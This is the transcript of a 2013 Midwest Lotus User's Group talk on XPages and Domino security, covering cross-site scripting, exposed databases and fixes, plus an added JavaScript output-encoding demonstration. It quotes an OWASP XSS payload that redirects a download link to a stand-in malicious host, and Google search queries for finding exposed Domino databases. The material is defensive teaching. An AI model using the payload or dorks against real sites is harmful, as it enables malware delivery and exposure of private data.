mwlug2013 - can your xpage codes stand up to hackers?
DESCRIPTION
Presentation at the 2013 MWLUG (Midwest Lotus User's Group) regional meeting.
- Explore vulnerabilities in current Domino sites.
- Describe why it is important for XPage developers to be aware of security issues.
- Show simple remediation steps.
TRANSCRIPT
Can your Xpage App Stand Up to Criminals?
Bernie Leung
MESA Technology
08/22/2013 Bernie Leung, MESA Technology www.MESATechnology.com
Not another Domino Security Talk, Right?
How to Secure Domino Server
Then what are these doing here?
Controlled Environment? ... No More
Vulnerability
Topics:
1. XSS
2. Security by Obscurity
3. What can we do about it?
And demos: open your laptop and follow along.
Anatomy of Xpages Web App
<xp: ..... >
Cross Site Scripting
Why is it Bad?
Demo.
XSS – non-persistent
For example, consider a site that has a welcome notice "Welcome %username%" and a download link.
Instead you enter:
http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>
*Sample copied from OWASP
XSS – persistent
User form input, stored and later retrieved by others
*Sample copied from OWASP
Fixing the Vulnerability
In JSP:
Include JSTL (Java Standard Tag Library) and output via c:out value="${outputWords}"
In Domino:
Add to NOTES.ini: DominoValidateFramesetSRC=1
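The JSP remedy above works because c:out HTML-encodes the value it writes (escapeXml is on by default), so a username containing tags is rendered as text rather than parsed as markup. The following is an added example, not code from the presentation: a small output encoder applying the same five-character substitution, shown against the "Welcome %username%" notice from the non-persistent XSS slide. The template strings, function names and the /download link are assumptions made for the demonstration; the sample input is the OWASP payload quoted on the slide.

```javascript
// Added example (not from the presentation): output encoding for the
// "Welcome %username%" notice described on the XSS slides.
// The substitutions match what JSTL's <c:out> applies by default
// (escapeXml="true"): &, <, >, " and ' become entity references.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode an untrusted value for an HTML text (element content) context.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering (hypothetical template): the query-string value is
// concatenated straight into the markup, so a value containing tags
// becomes part of the page and the browser executes it.
function renderWelcomeUnsafe(username) {
  return `<p>Welcome ${username}</p><a href="/download">Download</a>`;
}

// Fixed rendering: same template, but the untrusted value is encoded
// before it is concatenated, so it can only ever be displayed as text.
function renderWelcomeSafe(username) {
  return `<p>Welcome ${escapeHtml(username)}</p><a href="/download">Download</a>`;
}

// Crude check used here only to show the difference: does the markup still
// contain a raw <script> element? A real review would use an HTML parser.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed input: the OWASP sample quoted on the slide, as it would
// arrive decoded from the "user" query parameter.
const OWASP_SAMPLE =
  '<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); ' +
  'AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>';

// Returns both renderings side by side for comparison.
function compareRenderings(username) {
  const unsafe = renderWelcomeUnsafe(username);
  const safe = renderWelcomeSafe(username);
  return {
    unsafe,
    safe,
    unsafeHasScript: containsScriptTag(unsafe),
    safeHasScript: containsScriptTag(safe),
  };
}
```

Calling compareRenderings(OWASP_SAMPLE) returns unsafeHasScript true and safeHasScript false; the safe rendering shows the literal text "&lt;script&gt;..." to the visitor and leaves the download link untouched. The encoding is context-specific: this function is right for element content and quoted attribute values, but a value placed inside a script block, a URL or a CSS property needs the encoder for that context instead.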
How Many other Libraries Do You Use?
Are you bringing in vulnerabilities?
Security by Obscurity
Another Common Vulnerability
Sensitive nsf open to public
Google is our frien-emy
inurl:/ibmsxpres
inurl:/names.nsf
inurl:/todo.nsf
DEMO
Keeping Up with the Bad Guys
IBM AppScan
Open Source
DEMO
How I Found the Vulnerabilities Using IBM AppScan
Thank You and Be Safe.
Contact Bernie Leung [email protected]